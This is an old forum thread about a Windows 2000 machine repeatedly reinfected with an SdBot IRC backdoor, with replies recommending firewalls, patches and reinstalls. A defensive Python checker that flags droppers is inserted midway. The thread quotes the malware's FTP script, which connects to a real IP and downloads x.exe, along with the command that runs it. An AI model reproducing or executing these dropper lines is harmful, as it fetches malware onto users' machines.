I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit
This on a fresh installation of windows 2000.
I have internet explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not touching the pc, after a while it pops up again.
I just want to block unwanted files being deposited on my computer.
This on a fresh installation of windows 2000.
Assuming it was a clean reinstall, you obviously made the same mistake and got infected again.
1) You need to perform a complete antivirus scan.
2) Ditch Internet Explorer and use Opera or Firefox.
3) You probably need to install firewall software - ZoneAlarm is popular.
If you use this computer for banking or even buying stuff with credit cards, a complete scrub clean is advisable, however, before you do that, download Firefox, ZoneAlarm and AVG onto a cd or flash drive so that you can install them before connecting to the internet.
Kaled.
reformatted and started again
The system takes up 2.6GB which includes a 2GB pagefile.sys.
And I know that I could use firefox.
Even if I am not touching the pc, after a while it pops up again
I know that I can try installing all kinds of software.
I know that I can (and do) use linux instead.
I have AVG anti-virus and AVG anti-spyware (formerly Ewido) installed.
But I want to know, on windows, how to turn off the service, port, or whatever that lets this IRC trojan guy plant stuff on my system.
How did you get infected with the trojan on a fresh install? How old is the install? By that I mean, did you JUST format and reinstall or has it been a week or two? Somehow, somewhere you got infected.
Blocking IRC is simple enough, but you will need some type of firewall either hardware or software (such as zone alarm as was already recommended), but the reality is you have a trojan and need to get rid of that.
You are running an antivirus, but it sounds to me as if your system was either already infected when you installed the antivirus or your AV program isn't picking up the trojan. It's picking up its attempt to write to the system32 directory, but not the original trojan itself, which is what you need to get rid of.
Doing a quick search, I didn't find anything specific for irc.sdbot2, but many things for backdoor.irc.sdbot, which leads me to believe what you have may be a variant of the original sdbot trojan.
Here is exactly what it says in AVG virus vault:
Trojan horse IRC/BackDoor.SdBot2.JJK
C:\WINNT\System32\x.exe
Moved object
infected
And you are right that a search does not turn up any information on this exact thing.
If you are interested in that file - i - in my first post, it is an ftp script and anyone could do:
ftp -n -s:i
to download the stupid x.exe file.
Blocking IRC is simple enough
[edited by: lmo4103 at 3:31 pm (utc) on Oct. 11, 2006]
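As an added illustration of the triage check behind this (not code from the thread or from any poster): a small Python script that parses an ftp command file like `i` and reports why it looks like a dropper. The sample scripts and the 192.0.2.10 address are constructed placeholders, not the values from the post.

```python
"""Flag plain-text FTP command scripts (the kind run with `ftp -n -s:<file>`)
that fetch executables. Added example; the samples below are constructed and
192.0.2.10 is a documentation-range placeholder address."""
import re
from typing import Dict, List

EXEC_EXT = re.compile(r"\.(exe|com|scr|bat|cmd|pif|dll)$", re.IGNORECASE)
BARE_IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

# Constructed samples: one shaped like the dropper in the thread, one benign.
DROPPER_SAMPLE = "open 192.0.2.10 6497\nuser 1 1\nget x.exe\nquit\n"
BENIGN_SAMPLE = "open ftp.example.org\nuser anonymous me@example.org\nget README.txt\nbye\n"


def parse_ftp_script(text: str) -> Dict[str, object]:
    """Extract host, port, user and fetched files from an FTP command script."""
    info: Dict[str, object] = {"host": None, "port": 21, "user": None, "gets": []}
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            info["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                info["port"] = int(args[1])          # `open host port` form
        elif cmd == "user" and args:
            info["user"] = args[0]                   # `user name pass` form
        elif cmd in ("get", "mget", "recv") and args:
            info["gets"].extend(args)
    return info


def assess_ftp_script(text: str) -> List[str]:
    """Return the reasons this script looks like a dropper (empty = no flags)."""
    info = parse_ftp_script(text)
    reasons: List[str] = []
    if info["host"] is None:
        return reasons  # no `open` line: not an FTP command script at all
    if info["port"] != 21:
        reasons.append(f"non-standard FTP port {info['port']}")
    if BARE_IPV4.fullmatch(str(info["host"])):
        reasons.append("connects to a bare IP address, not a hostname")
    for name in info["gets"]:
        if EXEC_EXT.search(name):
            reasons.append(f"downloads executable {name}")
    return reasons


if __name__ == "__main__":
    print(assess_ftp_script(DROPPER_SAMPLE))  # three flags
    print(assess_ftp_script(BENIGN_SAMPLE))   # []
```

Running it over every small text file in system32 (rather than the embedded samples) turns it into the kind of check that would have surfaced `i` before x.exe was fetched.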
Did you have this problem prior to the reinstall or is this new since the format/reinstall?
It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.
Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?
My recommendation:
1) Get zone alarm, download it, save it to hard drive or burn it to a cd
2) Take the computer offline and do yet another fresh install. Format, reinstall, everything.
3) Install zone alarm
4) Reconnect and immediately go to windows update and get all the latest updates.
5) Install antivirus
6) Get Firefox and never use IE unless absolutely necessary.
It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install. Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?
Yes, bad luck!
I redid this 3 times and 3 times bad luck too!
Hey! At 56k, downloading all the windows patches is 12hrs. solid!
I have ordered SP4 cd.
But there should be a way to gain control of my own computer!
Still, 3 times and this happens every time. That is bad...and you are positive you are completely formatting the hard drive on each reinstall?
That is crazy!
A couple of additional thoughts. Is this a standalone computer or is it networked with others that could be infecting it?
Are there any other programs you have installed that could be the source of the trojan? Something you have installed again with each fresh install?
[edited by: Philosopher at 3:59 pm (utc) on Oct. 11, 2006]
Just very hard when your antivirus won't pick up the trojan.
You didn't read my first post.
Grisoft keeps catching it.
It does catch it!
Is there a way to turn off/ prohibit IRC on windows?
Review:
1. Format partition
2. Install windows 2000 from windows 2000 cd
3. Install Grisoft anti-virus
4. Update virus database
5. Grisoft catches Trojan horse IRC/BackDoor.SdBot2.JJK and puts it in virus vault
[edited by: lmo4103 at 5:25 pm (utc) on Oct. 11, 2006]
Your AV program is picking up the symptom of the problem, not the cause and that is what you need to get rid of. If it was getting rid of the cause, you wouldn't keep having this problem.
I would try youfoundjake's suggestion and boot into safe mode and scan with your AV prog again and see if it finds it that way.
As to the IRC blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports.
[edited by: Philosopher at 5:23 pm (utc) on Oct. 11, 2006]
Firewalls exist for a reason. I can see no valid reason for not installing Zone Alarm or a similar program.
If the trojan is being repeatedly installed (and caught by AVG) then either it is being installed directly (for which you must ensure file sharing is suitably blocked and install a firewall) or an attempt is being made periodically to reinstall it either by another process or as scheduled event.
If Zone Alarm does not block these attempts and they continue after a full virus scan, you have no alternative but to start again, and this time use proper security software from the start.
If you don't want to follow advice, then learn to live with the infection.
Kaled.
Logfile of HijackThis v1.97.7
Scan saved at 3:31:56 PM, on 10/11/2006
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
E:\download\searchalot\HijackThis.exe
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - [update.microsoft.com...]
O17 - HKLM\System\CCS\Services\Tcpip\..\{092648CB-F073-4C16-A579-6FFF6F5DB46D}: NameServer = 205.152.37.23 205.152.144.23
Downloading zone alarm - 30 minutes left
I doubt that this was the route by which the infection arrived (or continued to reappear) but since it only takes a few seconds to check I thought it was worth pointing out.
Kaled.
Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.
From the Control Panel, open the Network Connections folder and then open the properties dialog for the network adapter. For Internet access, only the TCP/IP box needs to be ticked.
However, if the same network adapter is used to connect to the Internet and to a local area network, this may not be appropriate.
From memory, using a dialup adapter, you may be prompted to disable sharing but I'm not sure.
Kaled.